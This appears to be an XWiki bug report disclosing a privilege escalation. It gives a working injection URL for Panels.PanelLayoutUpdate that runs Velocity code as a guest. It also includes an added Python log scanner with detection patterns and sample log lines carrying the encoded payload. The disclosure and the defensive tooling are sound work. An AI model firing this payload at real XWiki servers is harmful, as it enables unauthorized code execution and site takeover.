Details
- Bug
- Resolution: Solved By
- Blocker
- 3.2 M1
- Unit
- Unknown
- N/A
- N/A
Description

Steps to reproduce:

As guest, or as a logged-in user without wiki admin right, open <xwiki-host>/xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&eval=Hello%20from%20URL%20Parameter!%20I%20got%20programming%3A%20%24services.security.authorization.hasAccess(%27programming%27) where <xwiki-host> is the URL of your XWiki installation.

Expected result:

The message

You are not admin on this place {{/html}}{{async async=false}}{{velocity}}#evaluate($request.eval){{/velocity}}{{/async}}.

is displayed.

Actual result:

The message

You are not admin on this place Hello from URL Parameter! I got programming: true.</p> </div> </div>{{/html}}

is displayed.

This demonstrates a privilege escalation from view right on Panels.PanelLayoutUpdate (by default visible for guests) to programming right, caused by XWiki syntax injection. Note that while the injected XWiki syntax is subject to HTML escaping, the above URL shows how to circumvent that limitation by using #evaluate($request.eval): the parameter value is never HTML-escaped, so arbitrary Velocity code can be executed. The same attack vector also allows executing Groovy code, with the same HTML-escaping limitation; again, evaluation can be used to circumvent the limitation if it becomes an issue.

This vulnerability most likely exists since XWiki 3.2 M1 when, as part of XWIKI-6504, this code was converted to XWiki syntax 2.0.
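The core point of the report is that HTML escaping does not neutralise XWiki macro syntax, because `{` and `}` survive `$escapetool.html`. The following Python is an added example (not part of the issue or of the XWiki project) for a defender reviewing web server access logs: it percent-decodes each request's query parameters, flags values carrying XWiki 2.x macro delimiters or Velocity directives such as the `{{velocity}}#evaluate($request.eval)` pattern above, and shows that HTML-escaping such a value leaves the macro markers intact. The log format, the sample IPs and the `INJECTION_PATTERNS` heuristics are assumptions chosen for this example.

```python
"""Flag URL parameters that smuggle XWiki macro / Velocity syntax.

Added example, not XWiki project code. Detection heuristic only:
macro delimiters and Velocity directives in a plain-text parameter
(such as `place` on PanelLayoutUpdate) are a strong signal of injection.
"""
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Markers that have no business in a plain-text parameter value
# (constructed heuristic list; `$19.99` would also match the last one).
INJECTION_PATTERNS = [
    re.compile(r"\{\{/?\w+"),                        # {{velocity}}, {{/html}}
    re.compile(r"#(evaluate|set|if|foreach)\s*\("),  # Velocity directives
    re.compile(r"\$\w+\.\w+"),                        # Velocity references: $request.eval
]

# Assumed access-log shape: <ip> - - [<ts>] "<method> <path> <proto>" <status>
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')


def decode_params(url: str) -> dict:
    """Percent-decoded query parameters of `url` (blank values kept)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def find_injection_markers(url: str) -> dict:
    """Map parameter name -> matched marker strings for every parameter whose
    decoded value contains XWiki macro or Velocity syntax."""
    hits = {}
    for name, value in decode_params(url).items():
        matches = [m.group(0) for p in INJECTION_PATTERNS for m in p.finditer(value)]
        if matches:
            hits[name] = matches
    return hits


def survives_html_escaping(value: str) -> bool:
    """True when HTML-escaping the value still leaves macro delimiters in it,
    i.e. when HTML escaping alone would not stop XWiki syntax injection."""
    return "{{" in html.escape(value, quote=True)


def scan_log(lines) -> list:
    """Return (client_ip, path_without_query, {param: markers}) for each
    request line whose query string carries injection markers."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format, skip
        ip, _ts, _method, path, _status = m.groups()
        hits = find_injection_markers(path)
        if hits:
            findings.append((ip, path.split("?", 1)[0], hits))
    return findings


# Constructed sample lines (not real traffic). The second one carries the
# percent-encoded macro markup from the issue description.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2023:10:00:00 +0000] "GET /xwiki/bin/view/Panels/PanelLayoutUpdate?place=left HTTP/1.1" 200',
    '203.0.113.7 - - [01/Jan/2023:10:00:01 +0000] "GET /xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D&eval=x HTTP/1.1" 200',
    '203.0.113.9 - - [01/Jan/2023:10:00:02 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {hits}")
    print("HTML escaping keeps {{ intact:", survives_html_escaping("{{velocity}}"))
```

The `survives_html_escaping` check is the practical lesson: a value that passes through `html.escape` (or `$escapetool.html`) still contains `{{...}}`, so content interpolated into wiki markup has to be escaped for the wiki syntax, not just for HTML.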
Attachments

Issue Links
- is related to XCOMMONS-2828 $escapetool.html doesn't escape {, allowing XWiki syntax injection (Closed)